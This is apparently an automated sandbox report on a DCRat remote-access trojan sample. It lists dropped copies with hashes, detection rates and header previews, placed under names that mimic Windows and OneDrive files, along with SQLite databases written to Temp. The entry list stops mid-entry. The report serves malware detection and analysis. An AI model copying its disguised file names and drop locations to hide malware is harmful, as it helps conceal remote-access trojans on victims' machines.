                                                                                                                                        C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4897280
                                                                                                                                        Entropy (8bit):1.2617733098837078
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:egY1Cj1eUAM2X3bV+rrmDl5/NJoBh3fVFycj3eI8HnR80p0C2jGJBHAfVDS3E6t1:elMednbV+rrmlzM6AOhujGJBKKE6t1
                                                                                                                                        MD5:99209E1F30A833E0C7654FCC0AA2C9C5
                                                                                                                                        SHA1:75AC3347AAE0A9DC3520CE0D31CA6EE2C7F4BBE5
                                                                                                                                        SHA-256:4CB5FDD185102520C29C5975190F67567EEFFAA42DC3692EE0CC9595B8A07E20
                                                                                                                                        SHA-512:ABD6CAC229FFAC33E6EC887E41B041C4E02A5DA1A054C474549657DFDA326AFBFD127C435F796D2945B0EB1D9586599936D0DDAE339845DD43A91610C5BAAA5B
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exe, Author: Joe Security
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                        Reputation:low
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H...........@...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                        C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exe:Zone.Identifier

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):26
                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                        Malicious:true
                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                        C:\Program Files\Windows Multimedia Platform\d8d7f04fab25b9

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):298
                                                                                                                                        Entropy (8bit):5.796161161182237
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:SEe/p8GRisQ23/dWBxWvoQE0xmiz/QVezYqrlz/Ax3c8rXk2zS+UJo4m5T29Gi:O/SGIsRQon9x8ezrz0c6P12ki
                                                                                                                                        MD5:3EF4EC1B7AEDDD3D49B8B67163EE1B31
                                                                                                                                        SHA1:E714C82368F01A2AEB4675BC3891C9A5830304B1
                                                                                                                                        SHA-256:88E3D03538B1A0DA243DA3CC852190A52D88010725D2A7B196DC56D0853A65DB
                                                                                                                                        SHA-512:96C3AC5C10FFF7D0D37F2728CB6077B94E1DA6ECEFF0DCA161501A7555BE7E8871CD4154593E142D5FEC4DBC8A8A52B63FF57E3A4A043A4272B48810813AB18B
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:low
                                                                                                                                        Preview:W1XS28a8V1HJEUn41UYFgGatvokyIZjjhl6mFCkcYaQAPkuRbb8qumvQanhOXm05RhmdXAyyu5qGzZeL3SXqb2z5zqLbfVEwkUtr8Q3anJ5y5paBJVUFOJeZrqnryXTY14feqwNnY6DS6A9KPKSJA9ha0T9RnMlPzg6BJ6UWIrqSGMcrqdboEKY2WFoWw5AMUxcZD7BTz5ATSPUn1SkJu7KpIEpER8kNrd7SuCntcHyJJEjHuAfdV0bXmxR9S6B1VxlyRB3yp1rnIBfEfhTRcG11Ckp7voafG7xWcuzsGr

                                                                                                                                        C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4897280
                                                                                                                                        Entropy (8bit):1.2617733098837078
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:egY1Cj1eUAM2X3bV+rrmDl5/NJoBh3fVFycj3eI8HnR80p0C2jGJBHAfVDS3E6t1:elMednbV+rrmlzM6AOhujGJBKKE6t1
                                                                                                                                        MD5:99209E1F30A833E0C7654FCC0AA2C9C5
                                                                                                                                        SHA1:75AC3347AAE0A9DC3520CE0D31CA6EE2C7F4BBE5
                                                                                                                                        SHA-256:4CB5FDD185102520C29C5975190F67567EEFFAA42DC3692EE0CC9595B8A07E20
                                                                                                                                        SHA-512:ABD6CAC229FFAC33E6EC887E41B041C4E02A5DA1A054C474549657DFDA326AFBFD127C435F796D2945B0EB1D9586599936D0DDAE339845DD43A91610C5BAAA5B
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exe, Author: Joe Security
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H...........@...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                        C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exe:Zone.Identifier

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):26
                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                        Malicious:true
                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                        C:\Recovery\WinStore.App.exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4897280
                                                                                                                                        Entropy (8bit):1.2617733098837078
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:egY1Cj1eUAM2X3bV+rrmDl5/NJoBh3fVFycj3eI8HnR80p0C2jGJBHAfVDS3E6t1:elMednbV+rrmlzM6AOhujGJBKKE6t1
                                                                                                                                        MD5:99209E1F30A833E0C7654FCC0AA2C9C5
                                                                                                                                        SHA1:75AC3347AAE0A9DC3520CE0D31CA6EE2C7F4BBE5
                                                                                                                                        SHA-256:4CB5FDD185102520C29C5975190F67567EEFFAA42DC3692EE0CC9595B8A07E20
                                                                                                                                        SHA-512:ABD6CAC229FFAC33E6EC887E41B041C4E02A5DA1A054C474549657DFDA326AFBFD127C435F796D2945B0EB1D9586599936D0DDAE339845DD43A91610C5BAAA5B
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\WinStore.App.exe, Author: Joe Security
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H...........@...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                        C:\Recovery\WinStore.App.exe:Zone.Identifier

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):26
                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                        Malicious:true
                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                        C:\Recovery\d8d7f04fab25b9

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:ASCII text, with very long lines (745), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):745
                                                                                                                                        Entropy (8bit):5.899283787627899
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:kXYeSNkMD3kit+A451VNet2p1VjfGpHWRVukO+/DPcz0KH27JAWqwQMu6WIWyZlV:+Ye89Uv1XeENjf8HWu0DPpuWXmtiNb
                                                                                                                                        MD5:7642E96CB681EDE7E8C37E1B49ECA021
                                                                                                                                        SHA1:33ABD9C51B7864A3ACAABC420C0C71573F8D36A8
                                                                                                                                        SHA-256:4BD0DE3C1DAEFD7E3D5E4CD2EC43047873FB3829846BC44B749808C3A3ADEBBD
                                                                                                                                        SHA-512:D824A0E2E18D811C0EA1C3678210FC48BC884F919502CE613162ABD14F1B9C46FBBC5831C6F17F31C9D50B3AA2BBFA6C914465E0F4DAAE25FB6F0D9FDE0D2C09
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:ZP5uwrV6CBaMgLOJluskKvRYsOVFpiKq2Whibr8IWKoxD6RDWIltCCjn7hChWQQe0tTKnpr3vjNAHdUv6Ssh7aozw3k4pawF3J6TmHZrar8czigdMRlEithaFeXtExOVxHH7hAIz2BHPcLAOXHrYzshJmfNItpmmdmprbj6LIvLhmR84eJW7GzfFk7UBwAGMYevzgSwyKfPEg9hUhTojTognHjHeO5YIp8IHgJXLXixkkbjkZ9edVg3u8Hs7LSjPGGYh1ZyY6cMu15DpAgEOa5wJFXJYba9F8hedCBtALFg2TI3DDC6pNUyLUPcdQZ7fdHwTbkm9wEDVY3z6eGVYdT1ntTJxjQtvIAZLWkmdZ72JRdwaZf8JEiBJQIkIbzZgUSMYenk4e18gbsWPhsXDRjqk8Q5N9eCkhWy9RX6v5EpNjfshwUksbWOullZNsW4AzY8F3X8JwmIN4dAdiXbo3TILHEYp8sDiKpYKgmoYWb6zOB0Hl5pU5PHfPx8z8TKDikDOFz65tCSbXT7FNQECCsn4i35soyaDR2Qn8lBv9ul27pH603lsOHB06IqM4OR4mOKfCTGlPSDSGu72v81vMryJ1ar05y0vdrQsfl4hw9c6EstMLya6Wfr4aAollQqabSzZePWKDT8MP2EIrepGY4Y79VRf7T5gTCew3Ts5bQ2Chepi5g3HkkCh31ZI71MuYb3NXSOXwtoHBWafqtjbZy5s962B3j7kDIoFkcKnR

                                                                                                                                        C:\Recovery\fd168b19609dff

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:ASCII text, with very long lines (772), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):772
                                                                                                                                        Entropy (8bit):5.898135762241463
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:rw5PPxmkK5rRCiyDw9Vc134c6YcxSA01jnO+FFKD0BWJnMuBAo3e:iPxmfzyM9VGOP4jnzKDNJNve
                                                                                                                                        MD5:93BC712F1937C2C0394904498CC367F8
                                                                                                                                        SHA1:AA0223CB8719ED3733238ED3C9C459EE22402FB3
                                                                                                                                        SHA-256:1A66DDDDF0FA7E26FD74314B06916D1D6C3B402768D4BCC7BFBF8A664A2E4E0F
                                                                                                                                        SHA-512:E5A221AECE14DDB88A4BA4EFA3AF3E069582B6989FBF2D7BE42A46A2C093299B65AE799C9EA1871B9406B829B95CBEDA4B2885F83A23DBD0E1BDAB766D7A0408
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:dhxVXCyXAi7Td5fSDEhRM6iBWPgVrjYf7APe45uoWsEcW2GTL9EbRAjg8v8HgcpbKbWdpAXIT35d1FpeJMKsf7O7atfI6mI4DnS4gnoKl6HXFGp2Ge8UR75MMYC6eOLrvAZNxu8fi9Gjz11UDmCcoymGrFsHkrpXualEqbFWfcvR0WXVgs32MtC7XTfrC050TtyZPxnlhp6MCVPVsWk1yxKAXoqX5XUph57Hi7GtFRUhx05CDK9pPDCgixBkGQqJUQpGXIxuQ1wgdnNhtoTvYpZd2biu5fmylKMgLyp5XOYYRfC5ke1c64vp1LO5jDyvO75SaqW48YXKQALXYnJbnK1qZhp9ktWUZnJTkuf4I7diglY1A1g63XHEFO33BWUOBDun02xoHOTqqTJxIy9tNZaCfFNV0l3vmPgd0vAHD1ypDbXwFFuMXlBlnsHupbyfUiDawq7Xx1pVlu8EraPu1qXBO4zHnPcmDSUeX6AYIXZg5pA2uDDOMDooLCM10ztiZDRSadrua1mdR1Fi47XkMOaAoqTUuJiSn0H2YscQVSyVaLWU6o63cJWKnRotKWAQTUzauNJMeGO3aEjcT9YFMozee6PGDsG9RhBGV5jseuZW5cuisLaK85EoeV6x8CIv9Om2CcGXZpkbOdiCLqY2S6BWcXmA9wubmnWq01fPECuSUnZAx4mRoQcDNQap0GYn5IzlH1MTLJxQLtBz7lNEJcxVKSdjbzZ8oHWMyy35sSFfdM2eOksP3TdcUdayYm2WtzmE

                                                                                                                                        C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4897280
                                                                                                                                        Entropy (8bit):1.2617733098837078
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:egY1Cj1eUAM2X3bV+rrmDl5/NJoBh3fVFycj3eI8HnR80p0C2jGJBHAfVDS3E6t1:elMednbV+rrmlzM6AOhujGJBKKE6t1
                                                                                                                                        MD5:99209E1F30A833E0C7654FCC0AA2C9C5
                                                                                                                                        SHA1:75AC3347AAE0A9DC3520CE0D31CA6EE2C7F4BBE5
                                                                                                                                        SHA-256:4CB5FDD185102520C29C5975190F67567EEFFAA42DC3692EE0CC9595B8A07E20
                                                                                                                                        SHA-512:ABD6CAC229FFAC33E6EC887E41B041C4E02A5DA1A054C474549657DFDA326AFBFD127C435F796D2945B0EB1D9586599936D0DDAE339845DD43A91610C5BAAA5B
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H...........@...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                        C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe:Zone.Identifier

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):26
                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                        Malicious:true
                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\3e88PGFfkf.exe.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1698
                                                                                                                                        Entropy (8bit):5.367720686892084
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
                                                                                                                                        MD5:5E2B46F197ED0B7FCCD1F26C008C2CD1
                                                                                                                                        SHA1:17B1F616C3D13F341565C71A7520BD788BCCC07D
                                                                                                                                        SHA-256:AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
                                                                                                                                        SHA-512:5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
                                                                                                                                        Malicious:true
                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                                                                        C:\Users\user\AppData\Local\Temp\08EkXibWVI

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):159744
                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\0NJVxFefPd

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\0RBfU6SfI6

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):126976
                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\0UBuTPEUIh

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):159744
                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\0XzgTv0S5o

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):28672
                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\0tt80dM9Cp

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
